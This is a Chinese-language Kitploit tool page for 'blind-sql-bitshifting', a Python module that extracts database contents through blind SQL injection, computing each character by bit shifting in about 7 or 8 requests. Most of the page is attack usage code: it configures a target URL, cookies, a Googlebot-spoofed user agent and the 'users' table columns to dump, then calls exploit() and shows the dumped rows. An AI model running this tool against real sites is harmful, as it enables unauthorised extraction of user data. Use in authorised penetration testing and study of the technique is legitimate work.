Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
blind-sql-bitshifting — 一个使用位偏移计算字符的盲SQL注入模块。 | Kitploit
工具/GitHubGitHub/awnumar/blind-sql-bitshifting
漏洞分析Web应用程序漏洞利用信息收集渗透测试Archived
GitHubawnumar/blind-sql-bitshifting

blind-sql-bitshifting

一个使用位偏移计算字符的盲SQL注入模块。

查看仓库
1334974年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

基于位移的盲SQL注入

这是一个通过位移法计算字符而非猜测字符的盲SQL注入模块。根据配置,每个字符需要7/8次请求。

用法

root@kitploit:~
import blind-sql-bitshifting as x

# Edit this dictionary to configure attack vectors
x.options

配置示例:

root@kitploit:~
# 易受攻击的链接
x.options["target"] = "http://www.example.com/index.php?id=1"

# 指定Cookie(可选)
x.options["cookies"] = ""

# 指定特定行的条件,例如 'uid=1' 表示管理员(可选)
x.options["row_condition"] = ""

# 布尔选项,是否跟踪重定向
x.options["follow_redirections"] = 0

# 指定User-Agent
x.options["user_agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# 指定要转储的表
x.options["table_name"] = "users"

# 指定要转储的列
x.options["columns"] = "id, username"

# 语句执行成功后页面中应出现的验证字符串
x.options["truth_string"] = "<p id='success'>true</p>"

# 请参见下文
x.options["assume_only_ascii"] = 1

assume_only_ascii 选项让模块假设正在转储的字符都是ASCII字符。由于ASCII字符集只到127,我们可以将第一位设置为0,无需计算。这可以减少12.5%的请求。本地测试显示,平均速度提升了15%。当然,如果转储的字符超出ASCII范围,可能会引起问题。默认值为0。

配置完成后:

root@kitploit:~
data = x.exploit()

这会返回一个二维数组,每个子数组包含一行,第一行是列标题。

示例输出:

[['id', 'username'], ['1', 'user1'], ['2', 'user2'], ['3', 'user3'], ['4', 'user4']]

可选地,你的脚本还可以利用 tabulate 模块来输出数据:

root@kitploit:~
from tabulate import tabulate

data = x.exploit()

print tabulate(data,
               headers='firstrow',  # 指定将第一行作为列标题
               tablefmt='psql')     # 使用 SQL 输出格式。也可以使用其他格式。

输出结果:

root@kitploit:~
+------+------------+
|   id | username   |
|------+------------|
|    1 | user1      |
|    2 | user2      |
|    3 | user3      |
|    4 | user4      |
+------+------------+
下载工具